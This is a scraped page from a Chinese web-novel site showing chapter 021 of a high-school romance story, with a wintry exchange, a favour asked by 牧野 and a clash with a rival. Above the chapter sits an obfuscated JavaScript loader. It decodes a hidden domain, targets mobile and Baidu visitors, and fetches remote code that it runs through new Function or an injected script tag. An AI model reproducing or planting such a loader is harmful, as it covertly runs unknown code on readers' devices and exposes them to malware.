98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

021小红帽(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

('021小红帽

“烫伤?”大拇指擦过小腹凹凸不平的疤印,熟悉的灼热在那一小块散开,魇被点燃的前一刻,冷风夹杂烟雾将她带回现实。少年长臂横过窗台伸向窗外,修长的食指和中指夹着烟卷,晚栀懒懒地依靠墙壁伸手:“我可以试试吗?”

少年鼻唇烟雾氤氲,深刻的轮廓带着颓废的性感,晚栀黑白分明的眼被捂住,来不及惊呼就被带入一场苦涩的吻当中。

“不要玩火。”

“当然。”

呛人的烟草味侵蚀原本旖旎的暧昧,侵蚀之微末,只有虚无。

又是一个清晨,爽朗的男声打散她的瞌睡:“你好,我是兰瑟。”

晚栀迟疑地握手,熟悉的蓝眼睛以及这个名字……“兰洛的弟弟?”

“我转学过来一个月了,终于见到你了。”

晚栀想起在万圣晚会上遇到过兰洛:“你几年级?”

“我高一,请多指教。”兰瑟腼腆地摸后脑勺,“我知道你就是Fox,你不要担心,我就是想和你见一面,你的帽子可真好看,围巾也好看……你放心绝对不会说出去。”说道后面眼前的小男生早已激动得红了脸,晚栀安抚性地摇头。

临上楼前晚栀友好地跟他道别:“有什么不懂的可以问我。”

“真的吗?”兰瑟开心地睁大眼,“那太好了。”他有着一种异域特有的乐观与直白,这种开心的情绪h很感染身边的人。

“如果我可以帮到你的话。”晚栀好笑地看着他就差没鼓掌的样子,“再见。”

兰瑟对着远去的背影大幅度地挥手:“不会不会,再见!”

A班教室已是醒神的朗朗读书声:“醉翁之意不在酒,在乎山水之间也……”晚栀刚放下书包,拿书的时候发现桌上有个个小纸条:帮个忙。

传过来纸条的柏灵好奇地问了句:“什么什么?”她同桌只是抿唇一笑。

无法无天的牧野竟然求她帮忙,还不用手机,稀奇。

柏灵被另外一个令人惊叹的事实转移:“你的语文练习册竟然这么快就补完了?”柏灵轻抚苍劲的字迹,翻了翻已经填满的纸页不住咋舌。

“嗯哼。”晚栀也暗自惊讶地看着如出一辙的笔迹。

讲台上语文老师宣布下节课抽背课文,凑手不及的两人立马终止谈话。

真是巧,正好早读醉翁亭记。

大课间晚栀围着厚厚的围巾出去楼梯间,牧野靠在墙上两手插在裤兜里,一如既往的痞气。

晚栀站在墙角不耐烦地跺脚,一到室外从脚往上迅速冰掉:“干嘛?”

牧野无赖地搭上她的肩:“帮个忙呗。”长臂被晚栀眼疾手快地推开:“好好说。”

“打打掩护?”

“发生什么事?”

“老头起疑了。”

晚栀踹了一脚旁边神色轻松的人:“是你太肆无忌惮了吧?”

“我那么不靠谱?”

晚栀挑眉不语。

牧野无奈地耸耸肩:“从家到学校都是他的地盘。”

“不如散了咯。”想起牧野的种种劣迹,晚栀竟然有点幸灾乐祸,学着他的样子耸肩,“继续流连温柔乡,对吧?”

总是意气风发的牧野沉默地盯着她,在心底发毛时晚栀发觉脖子一凉,惊讶地抬头,灰蓝的网格围巾早已搭上牧野的脖子,渐行渐远:“谢了。”

上课铃响起时,晚栀怅然若失地走到教室,刚刚抢人东西的某人嚣张跟她挥手,从多出的围巾到举止都引人侧目。

晚栀缩着脖子回座位,手机忽然震了一下:小红帽。

没头没脑的一句话。

晚栀摸了摸毛呢帽,不自在地看了眼窗户上的剪影。

化学老师开始示范实验步骤,装着八卦雷达的柏灵悄悄地凑过来,看了眼牧野的方向:“什么情况?”

“怎么?”晚栀正仔细地做实验笔记。

“刚刚突然娇羞。”柏灵八卦的目光聚在她白皙的长颈上,“不会吧?”

晚栀叹了口气停笔,一脸神秘莫测地摇食指:“知道得太多可不好哦。”

一经提醒,柏灵立马脸色爆红,乖乖拉上嘴巴的拉链。

校园里的八卦轶事传播向来迅速,光一个柏灵闭嘴没用,毕竟这是紧张的淘汰制下一大调剂,尤其是在湘南这个注重学习又学风开明的学校。

只是没想到速度更快的竟然是我们的湘南校花,放学后晚栀从学生会办公室离开,出门就碰上同一楼层办公但极少见的社团负责人宋凌菲。

“虞晚栀。”尽管在严寒的冬天,宋凌菲也不见笨重,校服衬衫加小香风呢子衣,步履轻松,“我以为我们算王不见王。”

晚栀轻笑:“王不见王?那可真抬举我了。”

“既然这样就不要总是肖想不属于你的东西。”

“其实这话应该对你说才对。”

澄澈的眼睛闪着意味不明的光,淡定地迎上对面犀利的眼神:“看好戏那么久怎么也得亲自出演一回啊对吧?”无所谓的态度惹恼专门跑来警告的人。

“前有赵可欣后有叶欣。”长久的优雅皲裂,挑衅从明媚的眉眼泄露,“你看你就是这么讨人厌,都不用我亲自出手。”

她们的每次交流都很坏心情,晚栀不欲多纠缠,肩与肩交错时,宋凌菲嗓音轻柔:“呆在你那见不得光的角落才是明智之举。”

晚栀弹走肩上多余的卷发,临走前明快地眨眼:“你这么有自知之明啊?”

她们一个在理科A班,一个在文科A班,井水不犯河水。看来,牧野的影响力确实大,没想到这么一下就坐不住了。

晚栀哼着歌下楼,路过高二那一层的楼梯口时又碰见奚扬:“很开心?”

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间